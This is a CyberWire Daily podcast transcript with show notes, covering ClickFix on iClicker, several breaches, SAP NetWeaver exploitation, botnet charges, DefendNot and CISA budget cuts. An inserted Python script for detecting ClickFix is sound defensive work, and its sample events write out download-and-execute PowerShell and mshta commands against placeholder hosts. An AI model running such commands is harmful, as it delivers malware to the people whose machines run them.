CyberWire Daily - No quick fix for a ClickFix attack.
Episode Date: May 12, 2025

A major student engagement platform falls victim to the ClickFix social engineering attack. Google settles privacy allegations with Texas for over one point three billion dollars. Stores across the UK face empty shelves due to an ongoing cyberattack. Ascension Health reports that over 437,000 patients were affected by a third-party data breach. A critical zero-day vulnerability in SAP NetWeaver is being actively exploited. Researchers uncover two major cybersecurity threats targeting IT admins and cloud systems. U.S. prosecutors charge three Russians and one Kazakhstani in connection with the takedown of two major botnets. A new tool disables Microsoft Defender by tricking Windows into thinking a legitimate antivirus is installed. Tim Starks, Senior Reporter from CyberScoop, discusses congressional reactions to White House budget cut proposals for CISA. Fair use faces limits in generative AI.

Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign up for our daily intelligence roundup, Daily Briefing, and you’ll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn.

CyberWire Guest
We welcome back Tim Starks, Senior Reporter from CyberScoop, discussing congressional reactions to White House budget cut proposals for CISA. You can find background information in these articles:
- House appropriators have reservations — or worse — about proposed CISA cuts
- Sen. Murphy: Trump administration has ‘illegally gutted funding for cybersecurity’

Selected Reading
- iClicker website compromised with fake ClickFix CAPTCHA installing malware (BeyondMachines.net)
- Google Agrees to $1.3 Billion Settlement in Texas Privacy Lawsuits (SecurityWeek)
- Fears 'hackers still in the system' leave Co-op shelves running empty across UK (The Record)
- 437,000 Impacted by Ascension Health Data Breach (SecurityWeek)
- SAP NetWeaver Vulnerability Exploited in Wild by Chinese Hackers (Cyber Security News)
- New SEO Poisoning Campaign Targeting IT Admins With Malware (Hackread)
- Three Russians, one Kazakhstani charged in takedown of Anyproxy and 5socks botnets (The Record)
- Defendnot — A New Tool That Disables Windows Defender by Posing as an Antivirus Solution (Cyber Security News)
- Five Takeaways from the Copyright Office’s Controversial New AI Report (Copyright Lately)

Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.

Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here’s our media kit. Contact us at cyberwire@n2k.com to request more info.

The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc.
Transcript
You're listening to the CyberWire Network powered by N2K.
Hey everybody, Dave here.
Join me and my guests, Outpost 24's Laura Enriquez and Michelo Steppa on Tuesday, May
13th at noon Eastern time for a live discussion on the biggest threats hitting web applications
today and what you can do about them. We're going to talk about why attackers still
love web apps in 2025, the latest threat trends shaping the security landscape, how
to spot and prioritize critical vulnerabilities fast, along with scalable
practical steps to strengthen your defenses. Again, the webinar is Tuesday,
May 13th for our live conversation on the state
of modern web application security. You can register now by visiting events.thescyberwire.com.
That's events.thescyberwire.com. We'll see you there.
Hey, everybody. Dave here. I've talked about DeleteMe before, and I'm still using it because it still works.
It's been a few months now, and I'm just as impressed today as I was when I signed
up.
DeleteMe keeps finding and removing my personal information from data broker sites, and they
keep me updated with detailed reports, so I know exactly what's been taken down.
I'm genuinely relieved knowing my privacy isn't something I have to worry about every
day.
The DeleteMe team handles everything.
It's the set-it-and-forget-it peace of mind.
And it's not just for individuals.
DeleteMe also offers solutions for businesses, helping companies protect their employees'
personal information,
and reduce exposure to social engineering and phishing threats.
And right now, our listeners get a special deal, 20% off your DeleteMe plan.
Just go to joindeleteme.com slash n2k and use promo code N2K at checkout.
That's joindeleteme.com slash n2k, code N2K at checkout.
A major student engagement platform falls victim to the ClickFix social engineering attack. Google settles privacy allegations with Texas for over $1.3 billion. Stores across the UK face empty shelves due to an ongoing cyberattack. Ascension Health reports that over 437,000 patients were affected by a third-party data breach. A critical zero-day vulnerability in SAP NetWeaver is being actively exploited. Researchers uncover two major cybersecurity threats targeting IT admins and cloud systems. US prosecutors charge three Russians and one Kazakhstani in connection with the takedown of two major botnets. A new tool disables Microsoft Defender by tricking Windows into thinking a legitimate antivirus is installed. Tim Starks, senior reporter from CyberScoop, discusses congressional reactions to White House budget cut proposals for CISA, and fair use faces limits in generative AI. It's Monday, May 12, 2025.

I'm Dave Bittner and this is your CyberWire Intel Briefing. Happy Monday and thanks for joining us here today. It is great to have you with us.
iClicker is a student engagement platform used by about 5,000 instructors and 7 million students at U.S. colleges, including major universities like Michigan and Florida. Between April 12 and the 16th of this year, its website was compromised in a ClickFix social engineering attack. A fake CAPTCHA tricked visitors into running a malicious PowerShell script by copying it from the clipboard into the Windows Run dialog. Once executed, the script connected to a remote server to fetch more malware. Depending on the visitor, the attack either gave hackers full access or downloaded harmless software to avoid detection. The likely payload was an information stealer, targeting credentials, browser data, and cryptocurrency wallets. iClicker confirmed the breach on May 6, stating its apps and data were unaffected and the vulnerability had been fixed. The number of affected users is still unknown.
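As an added illustration of the detection side of the ClickFix story above (example code written for this page, not from iClicker, BeyondMachines or CyberWire), the script below scans constructed process-creation records, in the shape of Sysmon Event ID 1 or Windows 4688 fields, for the tell-tale chain of explorer.exe launching PowerShell or mshta with a download-and-execute one-liner, which is what a command pasted into the Run dialog looks like in endpoint telemetry. The sample events, paths and URLs are constructed, and the indicator list is an assumption that a defender would tune to their own environment.

```python
"""Flag process-creation records that match the ClickFix pattern: a user pastes
a command into the Win+R Run dialog, so explorer.exe spawns powershell.exe (or
mshta.exe) with a one-liner that downloads and runs a second stage.
All records below are constructed samples, not real telemetry."""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / Windows 4688 shaped)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events (hypothetical hosts, paths and URLs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Run-dialog paste: hidden window, download cradle, invoke-expression
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -c "iwr http://example.invalid/x | iex"'),
    # Run-dialog paste with an encoded command (base64 body is a placeholder)
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              "powershell -nop -ep bypass -enc AQIDBAUGBwgJ"),
    # Run-dialog paste using mshta to pull a remote HTA
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/verify"),
    # Benign: an IDE running a local build script
    ProcEvent(r"C:\Program Files\VSCode\Code.exe", PS,
              "powershell -File build.ps1"),
    # Benign: user opens Notepad from Explorer
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe"),
]

# Interpreters commonly abused by paste-to-run lures (assumed list, tune locally).
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "certutil.exe"}
# The Run dialog and the Explorer address bar both launch children from explorer.exe.
SHELL_PARENTS = {"explorer.exe"}
# Command-line indicators, each paired with a human-readable label.
SUSPICIOUS = [
    (r"(?i)-w(?:indowstyle)?\s+h(?:idden)?", "hidden window"),
    (r"(?i)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", "encoded command"),
    (r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b",
     "web download"),
    (r"(?i)\biex\b|invoke-expression", "invoke-expression"),
    (r"(?i)\bhttps?://", "remote URL"),
    (r"(?i)\bmshta(?:\.exe)?\s+\S+", "mshta launch"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the indicator labels that make this event look like ClickFix,
    or an empty list when the parent/child pair or the command line is benign."""
    reasons = [label for pat, label in SUSPICIOUS if re.search(pat, ev.command_line)]
    if (basename(ev.image) in LOLBINS
            and basename(ev.parent_image) in SHELL_PARENTS
            and reasons):
        return reasons
    return []


def find_clickfix(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that matches the ClickFix pattern."""
    hits = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in find_clickfix(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {basename(ev.parent_image)} -> {basename(ev.image)}: {', '.join(why)}")
```

The parent/child pairing is what keeps this rule quiet: PowerShell launched by an IDE, a scheduled task or a management agent never reaches the indicator check, while the same one-liner typed into the Run dialog does. On real telemetry, the RunMRU registry key and clipboard-monitoring EDR events corroborate the same activity.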
Google will pay $1.375 billion to Texas to settle claims it secretly tracked users' locations, private browsing activity, and biometric data without consent.
The lawsuit, led by Attorney General Ken Paxton, alleged that Google continued tracking users
even with location services off and used the data for advertising profits.
It also claimed Google collected biometric data like facial geometry without proper consent.
Google denies wrongdoing but has since updated its policies.
The settlement is one of the largest U.S. privacy-related fines.
Co-op stores across the UK are facing empty shelves due to an ongoing cyberattack that began two weeks ago. Fearing hackers may still have access, the company has kept key logistics systems offline, severely disrupting deliveries. Staff report depot shipments are below 20 percent of normal, with meat, dairy, and eggs prioritized due to perishability laws. Other items like produce, canned goods, and cigarettes remain scarce. CEO Shirine Khoury-Haq confirmed customer and member data was compromised, though the nature of the hack is still unclear. Despite all stores remaining open, recovery is expected to take weeks. On the Scottish island of Islay, where Co-op is the only major grocer, special delivery processes are in place. Co-op, a member-owned cooperative, operates over 3,000 locations and does not have to report financial losses to public markets.
Ascension Health reported that over 437,000 patients were affected by a data breach tied to a third-party vendor's software vulnerability, not its own systems. Hackers exploited this flaw to steal sensitive data, including names, contact details, Social Security numbers, and health information. The breach likely stemmed from the Clop ransomware group's December 2023 attack on Cleo's file transfer platform. Impacted patients are being offered two years of free credit monitoring. This breach is smaller than Ascension's May 2024 ransomware incident, which affected 5.6 million.
A critical zero-day vulnerability in SAP NetWeaver is being actively exploited by Chinese state-sponsored hackers. The flaw, found in the Internet Communication Manager component, allows unauthenticated remote code execution via crafted HTTP requests. Despite emergency patches, many SAP systems remain exposed. Attackers are targeting high-value sectors like finance and manufacturing to steal sensitive data and establish persistent access. Researchers found that custom malware, dubbed SAFIRE, uses encrypted communication over SAP protocols, making detection difficult. The attack chain begins with a malicious SOAP request that exploits memory corruption and delivers a reverse shell. From there, attackers modify SAP configurations to maintain access. The sophisticated campaign raises concerns about supply chain risks and has already caused operational disruptions across critical sectors including healthcare, government, and infrastructure.
Varonis has uncovered two major cybersecurity threats targeting IT admins and cloud systems. First, attackers are using SEO poisoning to trick admins into downloading malware disguised as legitimate tools. These fake downloads can install backdoors like SmokedHam or monitoring software enabling credential theft and data exfiltration. In one case nearly a terabyte of data was stolen, followed by a ransomware attack. Separately, Varonis found a critical root access flaw in Azure's AZNFS mount utility used in HPC and AI workloads. The bug lets unprivileged users escalate to root by exploiting environment variables. Though Microsoft rated it low severity, the risk of full cloud compromise is significant. Varonis urges immediate patching and recommends a defense-in-depth strategy to reduce exposure.
U.S. prosecutors have charged three Russians and one Kazakhstani in connection with the takedown of two major botnets, Anyproxy and 5socks. The suspects allegedly ran a malware campaign that hijacked outdated wireless routers, converting them into proxy servers for rent on the seized websites. The botnets offered over 7,000 proxies, generating $46 million over 20 years. The operation, named Moonlander, involved international cooperation and technical analysis from Lumen Technologies. Many infected routers were found in Oklahoma, with global reach across over 80 countries. The FBI warns that outdated routers, especially older Linksys, Cisco, and TP-Link models, are prime targets for exploitation by threat actors, including Chinese hackers. Two defendants also face charges of using false identities to register domains. Authorities urge replacing unsupported routers to avoid similar compromises.
A new tool called DefendNot disables Microsoft Defender by exploiting the Windows Security Center API, tricking Windows into thinking a legitimate antivirus is installed. Created by a GitHub developer, DefendNot registers a fake antivirus product using reverse-engineered interactions with the undocumented WSC API, bypassing Microsoft's integrity checks by injecting its code into trusted processes like Task Manager. Once registered, Windows automatically disables Defender to avoid conflicts. While the tool requires admin privileges and persistent installation to survive reboots, it poses a risk if abused by malware developers. Security experts warn that although DefendNot showcases impressive technical skill, it highlights a significant security gap in how Windows handles AV product registration. The tool builds on the developer's earlier project, no-defender, and underscores the need for better safeguards in WSC's architecture.

Coming up after the break, my conversation with Tim Starks from CyberScoop discussing congressional reactions to White House budget cut proposals for CISA, and fair use faces limits in generative AI. Stick around.
And now, a word from our sponsor, ThreatLocker.
Keeping your system secure shouldn't mean constantly reacting to threats.
ThreatLocker helps you take a different approach by giving you full control over what software can run in your environment.
If it's not approved, it doesn't run. Simple as that.
It's a way to stop ransomware and other attacks before they start without adding extra complexity to your day.
See how ThreatLocker can help you lock down your environment at www.threatlocker.com.
Let's be real. Navigating security compliance can feel like assembling IKEA furniture without the instructions. You know you need it, but it takes forever and you're never quite sure if you've done it right. That's where Vanta comes in. Vanta is a trust management platform that automates up to 90% of the work for frameworks like SOC 2, ISO 27001, and HIPAA, getting you audit ready in weeks, not months. Whether you're a founder, an engineer, or managing IT and security for the first time, Vanta helps you prove your security posture without taking over your life. More than 10,000 companies, including names like Atlassian and Quora, trust Vanta to monitor compliance, streamline risk, and speed up security reviews by up to five times. And the ROI? A recent IDC report found Vanta saves businesses over half a million dollars a year and pays for itself in just three months. For a limited time you can get a thousand dollars off Vanta at Vanta.com slash cyber. That's Vanta.com slash cyber.
It is always my pleasure to welcome back to the show Tim Starks.
He is a senior reporter at CyberScoop.
Tim, welcome back.
It's great to be back.
So Tim, you have posted a couple of stories over on CyberScoop in the past week or so
looking at some of the proposed cuts to CISA and reactions from lawmakers about that. Can you unpack
some of your reporting here for us?
Yeah, sure. We start tail end of what would have been May 2nd, I think, where the administration
put out its skinny budget that they called it, basically lacking major details.
But it indicated that they would be looking to cut CISA's budget by $491 million, which
is, I think I estimated it was 17%.
Lawmakers have been saying close to 20%.
I think both are accurate.
But it's a pretty massive, pretty massive potential cut.
And the reasons they talked about doing this, they know, they don't go into a lot of
details, but they talk about this notion that the Trump administration has that the CISA
was part of the censorship industrial complex. We can talk more about whether that's true
or not in a second. But, you know, we saw some reaction from lawmakers first on the
House side, the appropriators. Democrats were very harsh about this cut.
They basically were saying this would be a killing blow
for the agency and other things.
The Republican chairman of the Homeland Security subcommittee, Mark Amodei,
had said, we need more details than this.
We're hearing that China and Russia are kicking our butts,
and here we are looking to cut this agency. So you need to really show us why you think we need to do that. And then continues on into later the week in which on Thursday of this week,
since it's time to do this, and the top Democrat on the Homeland Security Appropriations subcommittee,
Chris Murphy, said that this was an illegal gutting of cybersecurity at DHS to pay for the border
and that gets us up to speed. Well, let's go in a little reverse order then from where you laid
things out for us. Talking about Senator Murphy, what is the case that he's
making that these cuts might be illegal?
Yeah, he was painting with a broader brush when he said, when he was talking about the
powers of the purse that Congress has.
I mean, the idea is Congress appropriates money, the executive branch spends it.
And there have been a lot of things happening at CISA where cuts have
already happened to personnel, cuts have already happened to programs. There are talks about
even more cuts, potentially a thousand plus people at a 3,000 person agency. And Senator
Murphy's case was, this is illegal because you're ignoring congressional mandates.
Let's talk about Kristi Noem,
who has referred to CISA as playing the role
of the Ministry of Truth.
This rhetoric, I guess it feels old to me. I feel as though after the 2020 election and we had
members of Trump himself and of course his inner circle saying that the election was
fraudulent and all of those things, which as we know got played out in many, many courtrooms across the country. But my sense after all of that was that CISA was maybe out of self-interest
backing away from the misinformation role on their own.
And so it seems to me like this stuff coming from Kristi Noem is kind of
a solution in search of a problem.
I think that's a good characterization.
I'm trying not to editorialize here, but the administration,
the Biden administration, really backed off of anything it was doing on misinformation, disinformation,
which by the way, was at best a miniscule amount of the work
that the agency was doing. Then the Secretary of Homeland Security herself
evicted anybody who was in the election security community within CISA who was still working
on misinformation or disinformation anyway, and explicitly related to election security.
And that was, I think, the most revealing exchange, even though we led our story with
Senator Murphy, was between Senator Peters and Kristi Noem,
with him basically saying, okay,
so you got rid of 15 people out of 3,000.
How are you trying to get the agency back on mission?
She says it is back on mission.
But that's contradicted by the fact that if you look at
what little information there is in
the Trump administration budget proposal for fiscal
2026, their major reason that they're saying that we need to cut back on this agency is
that it's being this ministry of truth kind of thing.
So it's a little confusing about whether they believe this is still going on and if so,
what ways?
I mean, there are other programs that people have singled out there.
DHS has also gotten rid of.
So things like monitoring unlike extremism.
DHS has cut contracts for that under this administration.
So you start to wonder where the $491 million comes from
and whether, to quote Lauren Underwood, the top Democrat
on the House Appropriations Subcommittee,
that this isn't about cutting fat.
This is about deep cuts.
And I think probably it's a justification you can use, especially to the right, if you're
saying we need to cut the size of government overall and CISA has 3,000 people, we're going
to have to cut some people there too. That's what it kind of feels like to me is that this is more
an excuse, but maybe they'll surprise us and when they finally do release the full budget,
which appropriators don't know when that's going to happen, they said at these two sessions.
Maybe they'll reveal what they're cutting and we'll say, oh, that's what they were
referring to.
Or at least it'll make a little bit of sense, whether you agree or disagree with their interpretation
of things, you'll at least be able to point out and say, I understand their reasoning.
Right now I don't understand their reasoning, frankly.
Yeah.
I mean, obviously I'm left scratching my own head.
Clearly our adversaries are not slowing down or dialing back their investments in misinformation
or their attempts to get into our systems.
So it would seem to me like the mission is as important as ever.
Yeah.
And on that front specifically, if you were saying, I'm concerned about the government
censoring American speech, well, they've gotten rid of State Department programs that are
focused on foreign misinformation campaigns.
So I don't know, it still doesn't make a lot of sense like we were talking about.
If you're concerned about Russia and China, to their credit, despite the issues that this president
has had with Russia and whether he's too close to it, the CISA has stood by and said, we
believe Russia is a cyber threat.
So if you think they're threats, why would you cut these agencies?
They need to do a better job, I think, than they have so far to convince me that they
have a case.
And that's always what comes out of my baseline as a reporter, like, do they have a case? And then you make the case in a story,
you explain that case.
You let me decide, but right now I don't hear a case.
It doesn't make sense.
Well, when we look at proposed leadership for CISA,
is it possible that we could find ourselves
in a situation where we have a leader
who shields the workers from all of this political rhetoric
and just says, hey, everybody, heads down, we're going to continue our important work.
We're going to make the most of the funds we have.
Let me take all of the heat on all of this political stuff, but we've got work to do.
I think it's possible.
I think we actually saw that under the first Trump administration.
Chris Krebs, at least until the very end,
did a good job of keeping CISA off of the president's radar.
And the nominee for the CISA job is Sean Plankey.
He has a good reputation out there in the cyber world,
left and right.
He's considered a smart operator.
So we'll see what he does, you know, when the
time comes that he does have his hearing, what kind of things he'll say to walk this tightrope
of, you know, wanting to run an agency that you believe in, but also having it being cut under
your feet by your own president. We'll see what he can get done. I think it's at least possible
that he can mitigate some of these things. I think there was another hearing that I tuned into a little bit this week where Kash Patel,
who is probably as loyalist as it gets to Trump, was saying that the FBI needed more
money than the budget proposal.
So if he's saying it, I wonder if somebody who's less ideologically aligned, and I don't
mean to say that Plankey's not conservative
because my understanding is that he is.
But if somebody who's less ideologically aligned
to this MAGA movement,
maybe that person can find a way to walk that tightrope.
Yeah.
All right, well, we will have links
to all of Tim's reporting on these topics in our show notes.
Tim Starks is senior reporter at CyberScoop.
Tim, thanks so much for taking the time for us.
Thank you, Dave.
What's the common denominator in security incidents?
Escalations and lateral movement.
When a privileged account is compromised, attackers can seize control of critical assets.
With bad directory hygiene and years of technical debt, identity attack paths are easy targets
for threat actors to exploit but hard for defenders to detect.
This poses risk in active directory, Entra ID, and hybrid configurations.
Identity leaders are reducing such risks with Attack Path Management.
You can learn how Attack Path Management is connecting identity and security teams while reducing risk with BloodHound Enterprise, powered by SpecterOps.
Head to specterops.io today to learn more.
SpecterOps, see your attack paths the way adversaries do.
And finally, late last Friday, in a move as quietly timed as it was politically charged, the U.S. Copyright Office released a pre-publication version of Part 3 of its AI study, just hours before its top leadership was abruptly dismissed. The 108-page report tackles how copyright law, especially fair use, should apply to AI training. It argues that copying during training is presumptively infringing, and that even the model's weights may embed protected expression. The report emphasizes that fair use hinges on how the AI is ultimately used, not just how it's trained. Particularly striking is the Office's endorsement of a novel market dilution theory, warning that AI-generated content could flood and devalue markets, even without direct copying. While courts are not bound by the report, its detailed reasoning could shape the over 40 ongoing copyright cases involving generative AI. Whether the report survives changing political winds remains uncertain, but its legal implications are already rippling outward.
And that's the CyberWire.
For links to all of today's stories, check out our daily briefing at thecyberwire.com.
Don't forget to check out the Grumpy Old Geeks podcast where I contribute to a regular segment
on Jason and Brian's show every week.
You can find Grumpy Old Geeks where all the fine podcasts are listed.
We'd love to know what you think of this podcast.
Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly
changing world of cybersecurity.
If you like our show, please share a rating and review in your favorite podcast app. Please also
fill out the survey in the show notes or send an email to cyberwire at n2k.com.
N2K's senior producer is Alice Carruth. Our Cyberwire producer is Liz Stokes. We're
mixed by Trey Hester with original music and sound design by Elliot Peltsman.
Our executive producer is Jennifer Eiben, Peter Kilpe is our publisher, and I'm Dave Bittner.
Thanks for listening.
We'll see you back here tomorrow.

And now a word from our sponsor, SpyCloud. Identity is the new battleground, and attackers are exploiting stolen identities to infiltrate your organization. Traditional defenses can't keep up. SpyCloud's holistic identity threat protection helps security teams uncover and automatically remediate hidden exposures across your users from breaches, malware, and phishing to neutralize identity-based threats like account takeover, fraud and ransomware. Don't let invisible threats compromise your business. Get your free corporate darknet exposure report at spycloud.com slash cyberwire and see what attackers already know. That's spycloud.com slash cyberwire.